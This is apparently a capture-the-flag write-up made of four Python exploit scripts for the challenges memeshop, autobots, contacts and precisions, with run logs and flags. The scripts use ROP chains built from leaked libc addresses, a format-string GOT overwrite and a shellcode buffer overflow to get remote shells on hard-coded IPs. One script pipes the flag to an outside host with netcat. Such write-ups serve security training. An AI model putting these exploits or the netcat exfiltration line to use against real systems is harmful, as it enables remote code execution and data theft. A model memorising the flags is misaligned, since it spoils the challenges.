memeshop (400)

import socket, telnetlib, sys, time
import hashlib, zlib, random
from struct import pack, unpack
from subprocess import check_output

'''
PREPARE FUNCTIONS
Reuse
'''

def sock(HOST, PORT, debug=True):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect( (HOST, PORT) )
	if debug: print "[+] Connected to server"
	return s

def telnet(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

def send(s, m, debug = True):
	if debug: print "[+] Send:", repr(m)
	s.send(m)

def recv(s, debug = True):
	m = s.recv(4096)
	if debug: print "[+] Recv\n", repr(m)
	return m

def recv_full(s, debug = True):
	data = ""
	while True:
		m = recv(s, False)
		data += m
		if len(m)<4096: break
	if debug: print "[+] Recv\n", repr(data)
	return data

def recv_until(s, m, debug = True):
	data = ""
	while m not in data:
		data += s.recv(1)
	if debug: print "[+] Recv\n", repr(data)
	return data

def p(m):
	return pack("<Q", m)

def u(m):
	return unpack("<Q", m)[0]

s = sock("52.3.190.202", 1337)

recv_until(s, "uit\n", False)
send(s, "p\n")
recv_until(s, "number bro: ", False)
send(s, "L3Byb2Mvc2VsZi9tYXBz\n")
add_libc = int(recv_until(s, "uit\n", False).split("/lib/x86_64-linux-gnu/libc-2.19.so")[0].split('\n')[-1].split('-')[0], 16)

# 0x000000000001f4c3 : xchg eax, esp ; ret
# 0x000000000001f7a6 : pop rdi ; pop rbp ; ret
# 0x0000000000022b1a : pop rdi ; ret

add_system = add_libc + 0x46640
add_binsh = add_libc + 0x17ccdb
add_change = add_libc + 0x1f4c3
add_stack2 = add_libc + 0x22b1a
add_stack3 = add_libc + 0x1f7a6

#Test Local
#add_libc = 0x7ffff7538000
#magic = 0x000000000004652C (execv binsh)
#k = 'm\nGqtV9/9/AADDdFX3/38AAKZ3Vff/fwAA20xr9/9/AABhYWFhYWFhYUDmV/f/fwAA\n'
#(python -c "import sys; k = 'm\nGqtV9/9/AADDdFX3/38AAKZ3Vff/fwAA20xr9/9/AABhYWFhYWFhYUDmV/f/fwAA\n'; sys.stdout.write('n\n'*256+k);"; cat)

print "[+] Address base =", hex(add_libc)

answer = p(add_stack2) + p(add_change) + p(add_stack3) + p(add_binsh) + 'a'*8 + p(add_system)
answer = answer.encode("base64")

print "[+] Send 256 nicolas cage"

for i in range(256):
	print "[+]", i+1
	send(s, "n\n", False)
	recv_until(s, "uit\n", False)

print "[+] Send"

print "[+] Send skeletal for sure"

send(s, "m\n", False)
recv_until(s, "mr skeletal?\n", False)
send(s, answer + "\n", False)
recv_until(s, "uit\n", False)

send(s, "c\n", False)
print "[+] Shell on!"

telnet(s)

s.close()

'''
▶ python meme.py 
[+] Connected to server
[+] Send: 'p\n'
[+] Send: 'L3Byb2Mvc2VsZi9tYXBz\n'
[+] Address base = 0x7f3d62dbd000
[+] Send 256 nicolas cage
[+] 1
[+] 2
....
[+] 256
[+] Send
[+] Send skeletal for sure
[+] Shell on!
cd ..
cat flag
flag{dwn: please tell us your meme. I'm not going to stop asking}
'''

autobots (350)

import socket, telnetlib, sys, time
import hashlib, zlib, random
from struct import pack, unpack
from subprocess import check_output

'''
PREPARE FUNCTIONS
Reuse
'''

def sock(HOST, PORT, debug=True):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect( (HOST, PORT) )
	if debug: print "[+] Connected to server"
	return s

def telnet(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

def send(s, m, debug = True):
	if debug: print "[+] Send:", repr(m)
	s.send(m)

def recv(s, debug = True):
	m = s.recv(4096)
	if debug: print "[+] Recv\n", repr(m)
	return m

def recv_full(s, debug = True):
	data = ""
	while True:
		m = recv(s, False)
		data += m
		if len(m)<4096: break
	if debug: print "[+] Recv\n", repr(data)
	return data

def recv_until(s, m, debug = True):
	data = ""
	while m not in data:
		data += s.recv(1)
	if debug: print "[+] Recv\n", repr(data)
	return data

def p(m):
	return pack("<Q", m)

def u(m):
	return unpack("<I", m)[0]

def uu(m):
	return unpack("<Q", m)[0]


add_1stjmp = 0x4008CA
add_2stjmp = 0x4008B0


add_write = 0x7ffff7b00860
add_libc = add_write - 0xeb860
add_system = add_libc + 0x46640
add_pop_rdi = add_libc + 0x22b1a #gadget
add_magic = add_libc + 0x3BE100 #memory address has permission read/write

#get address of write in server

while True:
	time.sleep(0.2)
	s = sock('54.86.195.190', 8888)
	data = ""
	while len(data)<2780: data += recv(s, False)
	port = u(data[0x7d5:0x7d9])
	off_buf = 0x100000000-u(data[0x827:0x827+4])
	max_len = u(data[0x82f:0x82f+4])
	print "Port:", port
	print "Stack:", off_buf
	print "Read size:", max_len
	if port>100000 or off_buf>1000:
		s.close()
		continue
	
	#get write func address -> system address
	#pay = p(add_1stjmp) + p(0) + p(1) + p(0x601018) + p(100) + p(0x601018) + p(6) + p(add_2stjmp)


	#write string in valid memory , pop rdi from stack, call system
	pay = p(add_1stjmp) + p(0) + p(1) + p(0x601038) + p(100) + p(add_magic) + p(6) + p(add_2stjmp)
	pay += 'aaaaaaaa'*7 + p(add_pop_rdi) + p(add_magic) + p(add_system)

	if len(pay)+off_buf+8>=max_len: s.close(); continue
	pay = 'a'*(off_buf+8) + pay

	s2 = sock('54.86.195.190', port)
	send(s2, pay)
	
	#send command from part 2
	#listen on another host, to receive output
	send(s2, "cat flag | nc trich.im 9999\x00")
	#--------

	data = recv(s2)

	s2.close()
	s.close()

	break

'''
data = data[0:8]
add_write = uu(data)
print "[+] Address write", hex(add_write)
'''

#flag{c4nt_w4it_f0r_cgc_7h15_y34r}

contacts (250)

import socket, telnetlib, sys, time
import hashlib, zlib, random
from struct import pack, unpack
from subprocess import check_output

'''
PREPARE FUNCTIONS
Reuse
'''

def sock(HOST, PORT, debug=True):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect( (HOST, PORT) )
	if debug: print "[+] Connected to server"
	return s

def telnet(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

def send(s, m, debug = True):
	if debug: print "[+] Send:", repr(m)
	s.send(m)

def recv(s, debug = True):
	m = s.recv(4096)
	if debug: print "[+] Recv\n", repr(m)
	return m

def recv_full(s, debug = True):
	data = ""
	while True:
		m = recv(s, False)
		data += m
		if len(m)<4096: break
	if debug: print "[+] Recv\n", repr(data)
	return data

def recv_until(s, m, debug = True):
	data = ""
	while m not in data:
		data += s.recv(1)
	if debug: print "[+] Recv\n", repr(data)
	return data

def p(m):
	return pack("<I", m)

def u(m):
	return unpack("<I", m)[0]

def displayrecord(s):
	send(s, "4\n", False)
	data = recv_until(s, ">>> ", False)
	print "[+] Trigger fmt/Leak data"
	return data

def addrecord(s, name, phone, length, desc):
	send(s, "1\n", False)
	recv_until(s, "Name: ", False)
	send(s, name + "\n", False)
	recv_until(s, "Enter Phone No: ", False)
	send(s, phone + "\n", False)
	recv_until(s, "description: ", False)
	send(s, length + "\n", False)
	recv_until(s, "description:\n\t\t", False)
	send(s, desc + "\n", False)
	recv_until(s, ">>> ", False)
	print "[+] Add record '%s'" % name

def editrecord(s, name, newname):
	send(s, "3\n", False)
	recv_until(s, "change? ", False)
	send(s, name + "\n", False)
	recv_until(s, ">>> ", False)
	send(s, "2\n", False)
	recv_until(s, "description: ", False)
	send(s, "200\n", False)
	recv_until(s, "Description: \n\t", False)
	send(s, "this is test desc\n", False)
	recv_until(s, ">>> ", False)
	send(s, "3\n", False)
	recv_until(s, "change? ", False)
	send(s, name + "\n", False)
	recv_until(s, ">>> ", False)
	send(s, "1\n", False)
	recv_until(s, "New name: ", False)
	send(s, newname + "\n", False)
	recv_until(s, ">>> ", False)
	print "[+] Edit record '%s'" % name
	

#s = sock("192.168.56.103",9999) (local)
s = sock("54.165.223.128",2555)

recv_until(s, ">>> ", False)

#add 2 record
addrecord(s, "chim", "abc", "10", "xyz")
addrecord(s, "trich", "abc", "10", "xyz")
addrecord(s, "tri", "abc", "10", "xyz")

#leak strcmp/printf address
addr_contact = 0x804b0a0
addr_strcmp = 0x0804B00C
addr_free = 0x0804B014

pay1 = 'chim\x00'
pay1 += 'a'*(64-len(pay1))
pay1 += p(1)*2 + p(addr_contact+8) + p(addr_strcmp)
pay1 += "trich"

editrecord(s, "chim", pay1)
data = displayrecord(s).split("Phone #: ")[2]

leak_printf = u(data[4:8])
#leak_system = leak_printf - 60144 (local)
leak_system = leak_printf - 53104

print "[+] Leak printf = %s, system = %s" % (hex(leak_printf), hex(leak_system))

#write got/free

f_short1 = leak_system & 0xffff
f_short2 = leak_system >> 16

name1 = "%" + str(f_short1) + "c%10$hn"
pay2 = name1 + "\x00"
pay2 += 'a'*(64-len(pay2))
pay2 += p(1)*2 + p(addr_contact+8) + p(addr_free)

name2 = "%" + str(f_short2) + "c%10$hn"
pay3 = name2 + "\x00"
pay3 += 'a'*(64-len(pay3))
pay3 += p(1)*2 + p(addr_contact+80+8) + p(addr_free+2)
pay3 += "tri"

payload = pay2 + pay3

editrecord(s, "chim", payload)
displayrecord(s)


#get shell
addrecord(s, "shell", "01278797xx", "10", "/bin/sh")

send(s, "2\n", False)
recv_until(s, "remove? ", False)
send(s, "shell\n", False)

print "[+] SHELL"
telnet(s)

s.close()

'''
▶ python chim_contact.py
[+] Connected to server
[+] Add record 'chim'
[+] Add record 'trich'
[+] Add record 'tri'
[+] Edit record 'chim'
[+] Trigger fmt/Leak data
[+] Leak printf = 0xf764ac40, system = 0xf763dcd0
[+] Edit record 'chim'
[+] Trigger fmt/Leak data
[+] Add record 'shell'
[+] SHELL
cat flag
flag{f0rm47_s7r1ng5_4r3_fun_57uff}
'''

precisions (100)

import socket, telnetlib, sys, time
import hashlib, zlib, random
from struct import pack, unpack
from subprocess import check_output

'''
PREPARE FUNCTIONS
Reuse
'''

def sock(HOST, PORT, debug=True):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect( (HOST, PORT) )
	if debug: print "[+] Connected to server"
	return s

def telnet(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

def send(s, m, debug = True):
	if debug: print "[+] Send:", repr(m)
	s.send(m)

def recv(s, debug = True):
	m = s.recv(4096)
	if debug: print "[+] Recv\n", repr(m)
	return m

def recv_full(s, debug = True):
	data = ""
	while True:
		m = recv(s, False)
		data += m
		if len(m)<4096: break
	if debug: print "[+] Recv\n", repr(data)
	return data

def recv_until(s, m, debug = True):
	data = ""
	while m not in data:
		data += s.recv(1)
	if debug: print "[+] Recv\n", repr(data)
	return data

def p(m):
	return pack("<I", m)

def u(m):
	return unpack("<I", m)[0]


s = sock("54.173.98.115", 1259)
data = int(recv(s, False).strip().split(' 0x')[1], 16)
print "[+] Address", hex(data)
shell = "\x6a\x0f\x58\x83\xe8\x04\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"

pay = shell + 'a'*(0x80-len(shell)) + '\xA5\x31\x5A\x47\x55\x15\x50\x40' + 'aaaa'*3 + p(data) 
send(s, pay + "\n", False)
print "[+] Send payload"
recv(s, False)

print "[+] Get shell"
telnet(s)

s.close()

'''
▶ python precision.py
[+] Connected to server
[+] Address 0xfff260e8
[+] Send payload
[+] Get shell
cat flag
flag{1_533_y0u_kn0w_y0ur_w4y_4r0und_4_buff3r}
'''

Enjoy 🙂